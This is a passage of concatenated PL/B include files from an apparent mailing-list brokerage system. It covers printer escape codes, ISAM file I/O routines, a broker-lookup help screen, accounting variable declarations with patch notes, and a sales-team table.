HPGOTH10 INIT 033,"(8U",033,"(s0p14.29h10.00v0s-2b6T"
.
HPDTCH12 INIT 033,"(8U",033,"(s1p12.00v0s-2b4T"
HPDTCH10 INIT 033,"(8U",033,"(s1p10.69v0s-2b4T"
HPDTCH85 INIT 033,"(8U",033,"(s1p08.50v0s-2b4T"
.
PDTCH12 INIT 033,"(s5t",033,"s1P",033,"(s12V",033,"(s0S",033,"(s5T"
PDTCH10 INIT 033,"(s5t",033,"s1P",033,"(s10V",033,"(s0S",033,"(s5T"
PDTCH85 INIT 033,"(s5t",033,"s1P",033,"(s08V",033,"(s0S",033,"(s5T"
.
PGOTH12 INIT 033,"(s5t",033,"s1P",033,"(s12V",033,"(s0S",033,"(s6T"
PGOTH10 INIT 033,"(s5t",033,"s1P",033,"(s10V",033,"(s0S",033,"(s6T"
PGOTH85 INIT 033,"(s5t",033,"s1P",033,"(s08V",033,"(s0S",033,"(s6T"
.
HPSHADE INIT 033,"*p325x1400Y": position cursor
033,"*c1900A": width
033,"*c600B": height
033,"*c10G": area fill%
033,"*c2P" print it
.
HPTTRAY INIT 033,"&l1H" top tray
HPBTRAY INIT 033,"&l4H" bottom tray
<file_sep>/include/GNXTIO.INC
..............................................................................
.
. GNXTIO INCLUSION
. NIN RECORD NUMBER IO INCLUSION
.
. FILE NAME : NIGNXT
. REC LENGTH: 14 FIXED
. INDEX KEY : 1-8
.
..............................................................................
.
.
. ENTRY POINT : GNXTKEY
. REQUIRED : 'GNXTFLD'
. RETURNED : GNXTKEY/GNXTNUM record
. DESCRIPTION : EXACT ISAM KEY READ (banner added; the other entry points
. in this include already carry one)
.FIX: was "BRANCH GNXTFLAG OF GNXT1"; changed OF to TO to match the sibling
.entry points (same effect: flag=1 skips the lazy OPEN).
.
GNXTKEY BRANCH GNXTFLAG TO GNXT1
CALL GNXTOPEN
GNXT1 FILEPI 1;GNXTFILE
READ GNXTFILE,GNXTFLD;GNXTKEY:
GNXTNUM
RETURN
..............................................................................
.
. ENTRY POINT : GNXTTST
. REQUIRED : GNXTFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
.GNXTTST - existence test: reads into STR1 so GNXTKEY/GNXTNUM are untouched;
.caller tests the condition flags.
GNXTTST BRANCH GNXTFLAG TO GNXT2
CALL GNXTOPEN
GNXT2 FILEPI 1;GNXTFILE
READ GNXTFILE,GNXTFLD;STR1
RETURN
..............................................................................
.
. ENTRY POINT : GNXTKS
. REQUIRED :
. RETURNED : RECORD NUMBER RECORD
. DESCRIPTION : KEY SEQUENTIAL RECORD NUMBER FILE READ
.
GNXTKS BRANCH GNXTFLAG TO GNXT3
CALL GNXTOPEN
GNXT3 FILEPI 1;GNXTFILE
READKS GNXTFILE;GNXTKEY:
GNXTNUM
RETURN
..............................................................................
.
. ENTRY POINT : GNXTSEQ
. REQUIRED :
. RETURNED : RECORD NUMBER RECORD
. DESCRIPTION : SEQUENTIAL RECORD NUMBER FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
GNXTSEQ BRANCH GNXTFLAG TO GNXT4
CALL GNXTOPEN
GNXT4 FILEPI 1;GNXTFILE
READ GNXTFILE,SEQ;GNXTKEY:
GNXTNUM
RETURN
..............................................................................
.
. ENTRY POINT : GNXTWRT
. REQUIRED : 'GNXTFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
.GNXTWRT - exact ISAM key insert keyed by GNXTFLD.
.FIX: removed a stray "GOTO GNXT5 IF EQUAL" that followed the BRANCH. It
.tested a condition flag left over from whatever ran before this call, so
.with GNXTFLAG=0 it could jump past CALL GNXTOPEN and write to a file that
.was never opened. No other entry point in this include has that line.
GNXTWRT BRANCH GNXTFLAG TO GNXT5
CALL GNXTOPEN
GNXT5 FILEPI 1;GNXTFILE
WRITE GNXTFILE,GNXTFLD;GNXTKEY:
GNXTNUM
RETURN
..............................................................................
.
. ENTRY POINT : GNXTUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
.
.GNXTUPD - rewrite the record fetched by the caller's previous keyed read.
GNXTUPD BRANCH GNXTFLAG TO GNXT6
CALL GNXTOPEN
GNXT6 FILEPI 1;GNXTFILE
UPDATE GNXTFILE;GNXTKEY:
GNXTNUM
RETURN
..............................................................................
.
. ENTRY POINT : GNXTDEL
. REQUIRED : 'GNXTFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
GNXTDEL BRANCH GNXTFLAG TO GNXT7
CALL GNXTOPEN
GNXT7 FILEPI 1;GNXTFILE
DELETE GNXTFILE,GNXTFLD
RETURN
...............................................................................
.
. ENTRY POINT : GNXTOPEN
. REQUIRED : 'GNXTFLAG'
. RETURNED : 'GNXTFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN RECORD NUMBER FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
.On success sets GNXTFLAG=1 so later entry points skip the OPEN.
GNXTOPEN TRAP GNXTGONE IF IO
OPEN GNXTFILE,GNXTNAME
TRAPCLR IO
MOVE C1 TO GNXTFLAG
RETURN
.
.IO-trap target: hand the missing file name to the common FILEGONE handler
.(per the banner above, FILEGONE reports the error and aborts).
GNXTGONE MOVE GNXTNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/BRKHELP.INC
.............................................................................
.
.ENTER WITH - TOPWIND,BOTWIN,LWIND,RWIND - TO DEFINE WINDOW.
.EXIT WITH - brkNUM, brCOMP, NEED TO MOVE TO OTHER VARIABLES AND RETURN AT .
. EXIT PARAGRAPH.
.
. sep 93 DLH.
.............................................................................
.brkHELP - broker-number lookup by name (see banner above).
.  Enter with TOPWIND/BOTWIND/LWIND/RWIND defining the help window (defaults
.  applied by bsetWIN when TOPWIND is not a positive number).
.  Exit with brknum/brcomp set; brkAEXIT additionally sets OVER=YES when no
.  broker was chosen.
brkHELP CLEAR STR2
MOVE TOPWIND TO STR2
TYPE STR2 *VALID NUMBER?
CALL bsetWIN IF NOT EQUAL
CALL bsetWIN IF EOS
COMPARE C0 TO TOPWIND
CALL bsetWIN IF NOT GREATER
DISPLAY *SETSWALL TOPWIND:BOTWIND:LWIND:RWIND;
KEYIN *P1:1,*ES:
*P1:6,*EL,"I WILL HELP YOU FIND THE Broker NUMBER",*R:
*P1:6,*EL,"THAT YOU WANT":
*R,*P1:6;
goto ffloat
.NOTE(review): the unconditional "goto ffloat" above makes the next line
.unreachable - the search key prefix is always "01F" (floating match), never
."01L". Confirm whether the "01L" path was retired deliberately.
MOVE "01L" TO str3
KEYbrk KEYIN *P1:1,*ES,"TYPE IN Broker NAME : ":
*P1:2,*DV,brCOMP:
*P1:2,*T60,*EDIT,brCOMP
MOVE brcomp TO STR24
CMATCH "*" IN brcomp
GOTO brkAEXT1 IF EQUAL
KEYIN *P1:2,*DV,brcomp,*P1:3,"OK ? ",*T60,STR1:
*P1:3,*EL;
CMATCH NO TO STR1
GOTO KEYbrk IF EQUAL
CMATCH B1 TO brcomp
GOTO notnof IF EQUAL
GOTO notnof IF EOS
.Build the AIM search key: prefix ("01L" or "01F") plus the keyed name;
.the "01L" form pads with QUEStion wildcards.
MATCH "01L" TO str3
GOTO packb1 IF EQUAL
PACK nbrkfld2 FROM str3,brcomp
CALL chkbkey
GOTO brkEADA
packb1 PACK nbrkfld2 FROM str3,brcomp,QUEStion,question,question
CALL chkbkey
GOTO brkEADA
ffloat MOVE "01F" TO str3
GOTO KEYbrk
.First AIM lookup; OVER set by NbrkAIM means nothing matched.
brkEADA
CLEAR brknum
MOVE "*****NO brknum FOUND*****" TO brcomp
CALL NbrkAIM
IF OVER
MOVE "*****NO brknum FOUND*****" TO brcomp
GOTO brkAEXIT
.NOTE(review): the two clear lines below follow an unconditional GOTO and
.appear unreachable - confirm.
clear str4
clear brknum
else
MOVE brknum TO STR4
ENDIF
GOTO DISbrkA
.chkbkey - require at least 6 significant bytes in the packed search key.
chkbkey MOVELPTR nbrkfld2 TO n2
GOTO notnof IF ZERO
COMPARE C6 TO n2
GOTO notnof IF LESS *NOT ENOUGH INFO, LET THEM KNOW
RETURN *OK, RETURN
.brkEADA1 - next match (NbrkKG); skips duplicates of the number in STR4.
brkEADA1 CLEAR brknum
MOVE "*****NO brknum FOUND*****" TO brcomp
CALL NbrkKG
IF OVER
. MOVE STR24 TO brcomp
clear brfax
GOTO brkAEXIT
ENDIF
MATCH brknum TO STR4
GOTO brkEADA1 IF EQUAL
MOVE brknum TO STR4
GOTO DISbrkA
.brkEADA2 - prior match (NbrkKGP); only available when PC is zero, matching
.the two prompts at DISbrkA.
brkEADA2 CLEAR brknum
MOVE "*****NO brknum FOUND*****" TO brcomp
IFZ PC
CALL NbrkKGP
XIF
IF OVER
. MOVE STR24 TO brcomp
GOTO brkAEXIT
ENDIF
MATCH brknum TO STR4
GOTO brkEADA2 IF EQUAL
MOVE brknum TO STR4
GOTO DISbrkA
.Show one candidate and prompt: Enter = next, 'P' = prior (PC=0 only),
.'*' = accept/exit.
DISbrkA DISPLAY *P1:6,*EL,"##",brknum," ",brcntct:
*p8:7,brcomp;
ENDSET brcomp
IFZ PC
KEYIN *P1:5,"ENTER TO CONTINUE, (P)rior (*) TO END",*T254,STR1;
XIF
IFNZ PC
KEYIN *P1:5,"ENTER TO CONTINUE (*) TO END",*T254,STR1;
XIF
CMATCH STAR TO STR1
GOTO brkAEXT1 IF EQUAL
CMATCH "P" TO STR1
GOTO brkEADA2 IF EQUAL
GOTO brkEADA1
.............................................................................
notnof DISPLAY *P1:24,*BLINKON,*HON,*EL,"NOT ENOUGH INFO TO SEARCH":
*HOFF;
GOTO brkHELP
.............................................................................
.brkAEXIT - nothing chosen: clear brknum and flag OVER for the caller.
brkAEXIT
clear brknum
MOVE YES TO OVER
brkAEXT1 DISPLAY *P1:1,*ES,*RESETSW:
*P20:24,*HON,"ENTER (*) TO EXIT, (<) TO BACKUP":
" or (?) FOR HELP",*HOFF;
. MOVE STR24 TO brcomp
RETURN
................
.bsetWIN - apply the default help window (rows 18-24, cols 40-80).
bsetWIN MOVE "18" TO TOPWIND NO VALUES GIVEN,SET TO DEFAULTS
MOVE C24 TO BOTWIND
MOVE "40" TO LWIND
MOVE C80 TO RWIND
RETURN
............................................................................
<file_sep>/include/consacct.inc
..............................................................................
.
. CONSacct INCLUSION
.
. DEFINES ALL CONSTANT AND FREQUENTLY USED VARIABLES.
. for accounting programs specifically compute.inc
.
.Patch 1.68 JD 08Apr08 added 12781 Oglala Lakota to Rateten.
.Patch 1.67 JD 01Mar07 added 17865 Interfaith Alliance to rateten.
.Patch 1.66 DLH 12Jul06 Zero out Dawson & Epsilon Mailer vars
.patch #1.65 JD 08Jul05 Removed Unicef/Now escrow mailers.
.patch #1.64 JD 07Oct04 added # 21716 & 21703 to Rateten.
.patch #1.63 JD 21May04 added # 21558/20998 to Rateten.
.patch #1.62 JD 29Apr04 Removed Pop Conn 6476 from Rateten.
.patch #1.61 JD 13Apr04 <NAME> added to RateTen
.patch #1.60 JD 11Mar04 Mass Demo added to RateTen
.patch #1.59 DLH 15Dec03 add PFLAG tp RateTen
.patch #1.58 JD 18jul03 removed DNC from escmlrs.
.patch #1.57 JD 25jun03 removed AHS from rateten.
.patch #1.56 JD 18apr03 added Girls Inc epsimlrs/added DNC/NOW/PPFA escrmlrs.
.patch #1.55 JD 18Nov02 added DNC rateten var.
.patch #1.52 JD 04mar02 added covemlr for rebate.
.patch #1.51 JD 11DEC01 added qtybildn USED best quantity on Net orders.
.patch #1.5 DLH 08Jul01 rateten moved here
.patch #1.4 JD 13JUL01 removed american humane escrow.
.patch #1.3 DLH 23Jun00 move vars here from ninv0001.pls
.patch #1.2 DLH 15Oct99 new vars to breakout $ savings and fee on nets
.patch #1.1 DLH 07Apr99 - NININV Y2K & new COMpute.inc
.Patch #1.0 ASH 29Dec98 - NINORD Y2K, File expansion: vars added for increase in Quantities
. <NAME> 11/10/94 Created
.
.begin Patch 1.2
grossbase form 9.2
netsavins form 9.2
netsavfee form 9.2
.end Patch 1.2
.begin patch ninv0001 version 10.0
GrossBaseSR form 9.2 gross base on rental portion (split rental)
GrossBaseSE form 9.2 gross base on Exchange portion (split Exchange)
.end patch ninv0001 version 10.0
.Start Patch #1.0 - increased vars
.SELECT FORM 7.2
.TAXES FORM 7.2
.FORMAP2 FORM 7.2
.SAVEAP FORM 7.2
.LRINC FORM 7.2
.NININC FORM 7.2
.AMOUNT FORM 7.4
.AMOUNTX FORM 7.4
.CANUSE FORM 7.4 CANADIAN USE TAX
.GROSS FORM 7.2
.SHIP FORM 7.2
.CMPCOM FORM 7.2
.BRKCOM FORM 7.2
.AP FORM 7.2
.FLOAMT FORM 7.2
.SVECOM FORM 7.4
.PREPAY FORM 7.2
.FORMAR FORM 7.2
.SVEACR FORM 7.2
.ACAMT FORM 7.2
...
SELECT FORM 9.2
TAXES FORM 9.2
PRICE FORM 3.2 -not changed
PRICEx FORM 3.2 -not changed
FORMAP2 FORM 9.2
FORMAP3 FORM 9.2
SAVEAP FORM 9.2
LRINCX FORM 9.2 recovered commission on net orders
LRINC FORM 9.2
NININC FORM 9.2
XNININC FORM 9.2
AMOUNTr FORM 7.4 -not changed
AMOUNT FORM 9.4
AMOUNTx FORM 9.4
CANUSE FORM 9.4 CANADIAN USE TAX
GROSS FORM 9.2
argh94 FORM 9.4 .dlh 09Aug99 for commission on gross names on a net order
Grossar FORM 9.2 .DLH 22Jun99 for commission on gross names
. on a net order.
SHIP FORM 9.2
POST FORM 3.2 -not changed
CMPCOM FORM 9.2
BRKCOM FORM 9.2
AP FORM 9.2
FLOAMT FORM 9.2
SVECOM FORM 9.4
PREPAY FORM 9.2
FORMAR FORM 9.2
SVEACR FORM 9.2
.End Patch #1.0 - increased vars
.Start patch #1.0 - new vars added
FORM92 FORM 9.2
FORM93 FORM 9.3
FormNineTwo1 FORM 9.2
FormNineTwo2 FORM 9.2
FORM94 FORM 9.4
.End patch #1.0 - new vars added
.Start patch #1.0 - new vars to replace current vars
.I LEFT REPLACED VARS INTACT IN CASE THEY NEED TO BE USED ELSEWHERE.
.HOWEVER, NOTE THAT COMPUTE.INC NO LONGER USES THEM BUT INSTEAD
.USES THE FOLLOWING REPLACEMENTS!!!!
CMPT92 FORM 9.2 .replaces FORM72
CMPT94 FORM 9.4 .replaces FORM74
CMPT94X FORM 9.4 .replaces FORM74X
CMPT94A FORM 9.4 .replaces FORM74A
NET94 FORM 9.4 .replaces NET74
NET94N FORM 9.4 .replaces NET74N
.End patch #1.0 - new vars to replace current vars
.begin Invoice patch 10.001
Form34 Form 3.4
.end Invoice patch 10.001
FORM32 FORM 3.2
FORM72 FORM 7.2
FORM72x FORM 7.2 .split
FORM73 FORM 7.3
net74 FORM 7.4 .for net name orders
net74n FORM 7.4 .for net name orders save field.
form74a form 7.4
FORM74r FORM 7.4
FORM74 FORM 7.4
FORM74x FORM 7.4 .split
FORM82 FORM 8.2
CALCRUN FORM 9.2
RUNAR FORM 9.2 TOTAL ADDITIONAL TDMC RUNNING CHARGES AR.
RUNLR FORM 9.2 TOTAL COMMISION FROM RUNNING CHARGES.
RUNPASS FORM 9.2 TOTAL PASSED THROUGH TO TDMC.
RUNFLAT FORM 9.2 ALL NON-RUN CHARGES. IE MAG TAPE.
RUNRAR FORM 9.2 TOTAL ADDITIONAL TDMC RUNNING CHARGES AR.
RUNRLR FORM 9.2 TOTAL COMMISION FROM RUNNING CHARGES.
RUNRPASS FORM 9.2 TOTAL PASSED THROUGH TO TDMC.
RUNRFLAT FORM 9.2 ALL NON-RUN CHARGES. IE MAG TAPE.
RUNRCNT FORM 5
RUNFLAG DIM 1 HOLDS STAR IF TDMC RUNNING CHARGES INVOLVED
RUNCOUNT FORM 5
netflag form 1 1=gross order 2=net
.begin patch 1.1
.CODENUM FORM 2
.ADDKEY DIM 2
.ADDCODE DIM 2
CODENUM FORM 3
ADDKEY DIM 3
ADDCODE DIM 3
nacd1flag form 1 0=normal, 1=addcode '001' was encounterd
.end patch 1.1
.STR14 DIM 14 turned offset 14mar2001 jd conflicted with cons.inc
.Start Patch #1.0 - increased vars
.ACAMT FORM 7.2
ACAMT FORM 9.2
.end Patch #1.0 - increased vars
.begin patch 1.1
ordteflag DIM 1 yes = ORDER DATE after 7/1/99
NINVFRMFLAG FORM 1 1=MAILER, 2=mlr remitance, 3=OWNER/manager
NINVOUTFLAG FORM 1 0= no detail 1=PRT detail from compute 2=Display Detail
TOTREJ FORM 8
.ADDITIONAL CHARGE DESCRIPTION.
.
addcd1 dim 3 used in ninv0001 for display
addcd2 dim 3
addcd3 dim 3
addcd4 dim 3
addcd5 dim 3
addcd6 dim 3
addcd7 dim 3
addcd8 dim 3
addcd9 dim 3
addcd10 dim 3
addncd1 dim 3 used in ninv0001 for display
addncd2 dim 3
addncd3 dim 3
addncd4 dim 3
addncd5 dim 3
addncd6 dim 3
addncd7 dim 3
addncd8 dim 3
addncd9 dim 3
addncd10 dim 3
.begin patch nadj0001 1.4
addAext1 Dim 1
addAext2 Dim 1
addAext3 Dim 1
addAext4 Dim 1
addAext5 Dim 1
addAext6 Dim 1
addAext7 Dim 1
addAext8 Dim 1
addAext9 Dim 1
addAext10 Dim 1
.end patch nadj0001 1.4
.addP1 dim 3 used in ninv0001 for display
.addP2 dim 3
.addP3 dim 3
.addP4 dim 3
.addP5 dim 3
.addP6 dim 3
.addP7 dim 3
.addP8 dim 3
.addP9 dim 3
.addP10 dim 3
addP1 dim 4 used in ninv0001 for display
addP2 dim 4
addP3 dim 4
addP4 dim 4
addP5 dim 4
addP6 dim 4
addP7 dim 4
addP8 dim 4
addP9 dim 4
addP10 dim 4
ADDESC1 DIM 35
ADDESC2 DIM 35
ADDESC3 DIM 35
ADDESC4 DIM 35
ADDESC5 DIM 35
ADDESC6 DIM 35
ADDESC7 DIM 35
ADDESC8 DIM 35
ADDESC9 DIM 35
ADDESC10 DIM 35
.
ATPRT DIM 1
AT1 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT2 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT3 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT4 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT5 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT6 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT7 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT8 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT9 DIM 1 ADDITION CHARGE PRINT LINE VAR.
AT10 DIM 1 ADDITION CHARGE PRINT LINE VAR.
.
.begin patch
.qty for charge
addqty DIM 9
addqty1 DIM 9
addqty2 DIM 9
addqty3 DIM 9
addqty4 DIM 9
addqty5 DIM 9
addqty6 DIM 9
addqty7 DIM 9
addqty8 DIM 9
addqty9 DIM 9
addqty10 DIM 9
.end patch
.ADDITIONAL CHARGE RATE.
.
ADD$RTE DIM 6
ADD$RT1 DIM 6
ADD$RT2 DIM 6
ADD$RT3 DIM 6
ADD$RT4 DIM 6
ADD$RT5 DIM 6
ADD$RT6 DIM 6
ADD$RT7 DIM 6
ADD$RT8 DIM 6
ADD$RT9 DIM 6
ADD$RT10 DIM 6
.
. TOTAL ADDITIONAL CHARGE
.
ADD$1 DIM 15
ADD$2 DIM 15
ADD$3 DIM 15
ADD$4 DIM 15
ADD$5 DIM 15
ADD$6 DIM 15
ADD$7 DIM 15
ADD$8 DIM 15
ADD$9 DIM 15
ADD$10 DIM 15
.end patch 1.1.
ACCMPR FORM 3.2
NewACCMPR FORM 3.4 for new compute 03 June 2003 DLH
AEXTCD DIM 1 ;10Sep2003 dlh - for Nadj0001 release 1.4
.AEXTCD --- if 1=use & an adjustment call go calc use original qtybild for calc, else use adj qty
ANINCD FORM 1
THOUS FORM "1000"
HUND FORM "100"
INDEX FORM 2
ppsw dim 1
PREPAYSW DIM 1 =Y IF PREPAY $
CMREFLAG FORM 1 0=NO 1=YES
CMREDOLR FORM 9.12
fulhouse init "TDMC-ANACAPA-EPSILON-PERLOWIN-LPS"
subppsw dim 1 -if yes handle prepays.
TDMCFLAG FORM 1 2=DO TDMC CALCS.
.begin patch 1.3
.dawsmlrs init "0036"
dawsmlrs init "0000"
covemlr init "0396"
EpsiMLrs INit "0000"
.epsimlrs init "2702-0904-1762-1604-0024-6319-3083-3852-0093-4417-9374-1403-5759"
.epsimlrs init "2702-0904-1762-1604-0024-6319-3083-3852-0093-4417-9374-1403"
.escrmlrs init "1498-0774-0308-5838-1921-2661"
.escrmlrs init "1498-0774-5838-1921-2661"
.escrmlrs init "1498-0774-1921-0073-0071-0076"
.escrmlrs init "1498-0774-1921-0073-0076-0055"
.begin patch 1.65
escrmlrs init "1498-0774-1921-0076"
.end patch 1.65
rebate FORM 9.4
.end patch 1.3
.begin patch 1.5 moved to consacct.inc 8/8/01
.begin patch 1.59
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-006476-004493-011947" $10 EXCHANGE MAN FEE LISTS
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-006476-004493-011947-014841" $10 EXCHANGE MAN FEE LISTS
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-006476-004493-011947-014841-020887" $10 EXCHANGE MAN FEE LISTS
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-006476-004493-011947-014841-020887-011278" $10 EXCHANGE MAN FEE LISTS
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-004493-011947-014841-020887-011278-021558-020998" $10 EXCHANGE MAN FEE LISTS
.begin patch 1.64
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-004493-011947-014841-020887-011278-021558-020998-021716-021703" $10 EXCHANGE MAN FEE LISTS
.end patch 1.64
.begin patch 1.67
;RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-004493-011947-014841-020887-011278-021558-020998-021716-021703-017865" $10 EXCHANGE MAN FEE LISTS
.end patch 1.67
.begin patch 1.68
RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-004493-011947-014841-020887-011278-021558-020998-021716-021703-017865-012781" $10 EXCHANGE MAN FEE LISTS
.end patch 1.68
.end patch 1.59
qtybildn FORM 9
.added dec 2002 --- for JOse
chgrqty form 9
CALCPER FORM 9
PER85 FORM "000.85"
CHGQTY1 FORM 8
CHGQTY2 FORM 9
.begin adj patch 1.4
RunChrgTot form 9.2
HoldRunChrg form 9.2
OrigQtyBild Form 9
QtyAdjFlag Dim 1 .if yes qty adjutment routine is calling compute
FrcCompFlag Dim 1 .IF set to "Y" force Recompute of previously billed order
.end adj patch 1.4
.added KCET #004493 08/08/2001
..RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-006476-014943" $10 EXCHANGE MAN FEE LISTS
.added Amer Humane #14943 04/11/2001
.RATETEN INIT "005172-016291-016533-018246-018678-019534-018575-006476" $10 EXCHANGE MAN FEE LISTS
..5172 planned parenthood
..16291 PP Voter fund
..16533 PP High Dollar
..18246 PP Action Fund
..18678 High dollar democrats master
..19534 La Raza
.added ZPG #18575 & 6476 02/02/2000
.added La Raza #19534 11/30/99
.removed UCS Sep 99 DLH
.RATETEN INIT "005172-016291-016533-018246-018678-005670" $10 EXCHANGE MAN FEE LISTS
.JUne 99 KCET rate reduced to $2 per SMM
.RATETEN INIT "004493-005172-016291-016533-018246-018678-005670" $10 EXCHANGE MAN FEE LISTS
. PP, KCET, UCS 9/1/98
.ncjw #015445 removed from list 9/24/98 DLH per SMM
.end patch 1.5
<file_sep>/include/Oslsteam.inc
; Last change: JD 4 May 2005 12:25 pm
; Last change: JD 25 Jan 1999 12:25 pm
*..............................................................................
* OSLSTEAMS/INC - ORDER SALES TEAMS TABLE. 01FEB89
* One INIT entry per sales team; blank entries are retired/unused slots.
*..............................................................................
.AUG312005 Replaced Suzie's Team with Ann's Team
.
OSLS0 INIT "NO SALESPERSON "
OSLS1 INIT "JEANETTE'S TEAM "
.OSLS2 INIT "REBECCA'S TEAM "
OSLS2 INIT "DELYNNE'S TEAM"
OSLS3 INIT "SUSAN'S TEAM"
OSLS4 INIT " "
.OSLS4 INIT "NANCY'S TEAM "
.OSLS5 INIT "BONNIE'S TEAM "
OSLS5 INIT " "
OSLS6 INIT "LIST MANAGEMENT "
OSLS7 INIT "ANN'S TEAM "
.OSLS7 INIT "SUZIE'S TEAM "
.OSLS8 INIT "COLD CALLS "
OSLS8 INIT " "
OSLS9 INIT " "
.OSLS9 INIT "EM's team "
.OSLS10 INIT "TIFFANY'S TEAM"
OSLS10 INIT " "
OSLS11 INIT " "
OSLS12 INIT " "
OSLS13 INIT " "
OSLS14 INIT " "
OSLS15 INIT " "
OSLS16 INIT " "
OSLS17 INIT " "
OSLS18 INIT " "
OSLS19 INIT " "
OSLS20 INIT " "
.OSLS21 INIT " "
.OSLS22 INIT " "
.OSLS23 INIT " "
.OSLS24 INIT " "
.OSLS25 INIT " "
.OSLS26 INIT " "
.OSLS27 INIT " "
.OSLS28 INIT " "
.OSLS29 INIT " "
...............................................................................
.ANY CHANGES IN THIS TABLE WILL ALSO REQUIRE CHANGING THE TABLE IN Nord0011.dbs AFTER
.PARAGRAPH READ2.
...............................................................................
<file_sep>/DEVELOP/Includes - why/naddBdd.inc
******************************************************
* NAddBDD INCLUSION
* SUBSIDIARY FILE FOR DATACARD
* ADDRESSING FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS MASTER ADDRESSING FILE.
* ****************************************************
; release 1.1 2005 June 18 DMB - Changed IP of File Manager
.
. FILE: NINAddB
. LENGTH: 20
. NOTE(review): header says LENGTH: 20 but the files below are FIXED=37
. (20 data bytes + 17-byte NAddBStamp) - confirm and update header.
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 1-9 NAddBLIST + NAddBNUM
.AIMDEX KEY: 1-6 NAddBLIST
......................................................
NAddBNAME INIT "NINAddB"
.>Patch 1.1 Begin
NAddBFLIST FILELIST
NAddBFILE IFILE KEYLEN=9,FIXED=37,Name="NINAddB.isi|NINS1:502"
NAddBFLE2 AFILE FIXED=37,Name="NINAddB.aam|NINS1:502"
FILELISTEND
.>Patch 1.1 End
.
NAddBLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NAddBFLD DIM 9
NAddBFLD1 DIM 9
NAddBFLAG FORM 1
NAddBPATH FORM 1
.
NAddBVARS LIST
NAddBLIST DIM 6 1-6 LIST NUMBER
NAddBNUM DIM 3 7-9 ADDRESS CODE NUMBER
NAddBPRICE FORM 5.2 10-17 SELECTION CODE PRICE
NAddBDESC DIM 3 18-20 SELECTION CODE DESCRIPTION
NAddBStamp Dim 17 21-37 stamp of when backed up
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /M
. "002" /FLAT
. "003" /EACH
. "004" /MIN
. "005" N/A
. "006" N/C
. "007" SEEBASE
. "008" SEEDESC
. "009" INQUIRE
LISTEND
<file_sep>/include/NCATCODEIO.INC
.....................................................................................
.
. NCATCODEIO INCLUSION
. NIN CATEGORY CODES FILE I/O ROUTINES
.
. FILE NAME : NINCODE
. REC LENGTH: 528 FIXED
. INDEX KEY : 1-6 NCATCODENUM (LIST NUM)
.AIMDEX KEYS: (1) XX-XX XXXX
. (2) XX-XX XXXXX
.
. Each entry point lazily opens the filelist (via NCATCODEOPEN) on first
. use, traps I/O errors to IOMssg, and clears the trap before returning.
........................................................................................
.
.
. ENTRY POINT : NCATCODEKEY
. REQUIRED : NCATCODEFLD
. RETURNED : CATEGORY CODES RECORD
. DESCRIPTION : EXACT ISAM KEY READ
.
NCATCODEKEY
BRANCH NCATCODEFLAG, NCATCODE1 // if filelist already open, don't open again
call NCATCODEOPEN
NCATCODE1
TRAP IOMssg Giving Error if IO // set up error trap in case read fails
. FILEPI 1;NCATCODEFILE
READ NCATCODEFILE,NCATCODEFLD;NCATCODEVARS
TRAPCLR IO
RETURN
........................................................................................
.
. ENTRY POINT : NCATCODETST
. REQUIRED : NCATCODEFLD
. RETURNED :
. DESCRIPTION : TEST KEY (key lookup only; record variables not loaded)
.
NCATCODETST
BRANCH NCATCODEFLAG, NCATCODE2 // if filelist already open, don't open again
call NCATCODEOPEN
NCATCODE2
TRAP IOMssg Giving Error if IO // set up error trap in case read fails
. FILEPI 1;NCATCODEFILE
READ NCATCODEFILE,NCATCODEFLD;;
TRAPCLR IO
RETURN
........................................................................................
.
. ENTRY POINT : NCATCODEWRT
. REQUIRED : NCATCODEFLD
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
. NOTE(review): FILEPI locks NCATCODEFILE only, while the WRITE targets the
. whole NCATCODEFLIST (isi+aam); confirm the aam member needs no lock here.
.
NCATCODEWRT
BRANCH NCATCODEFLAG, NCATCODE3
CALL NCATCODEOPEN
NCATCODE3
TRAP IOMssg Giving Error if IO // in case write produces errors
FILEPI 1;NCATCODEFILE
WRITE NCATCODEFLIST;NCATCODEVARS
TRAPCLR IO
RETURN
..............................................................................................
. ENTRY POINT : NCATCODEUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE CATEGORY FILE
.
NCATCODEUPD
BRANCH NCATCODEFLAG, NCATCODE4
CALL NCATCODEOPEN
NCATCODE4
TRAP IOMssg Giving Error if IO
FILEPI 1;NCATCODEFLIST
UPDATE NCATCODEFLIST;NCATCODEVARS
TRAPCLR IO
RETURN
.
..................................................................................................
. ENTRY POINT : NCATCODEDEL
. REQUIRED : NCATCODEFLD
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
. Verifies the key exists first (NCATCODETST); returns without
. deleting when the test read sets OVER.
.
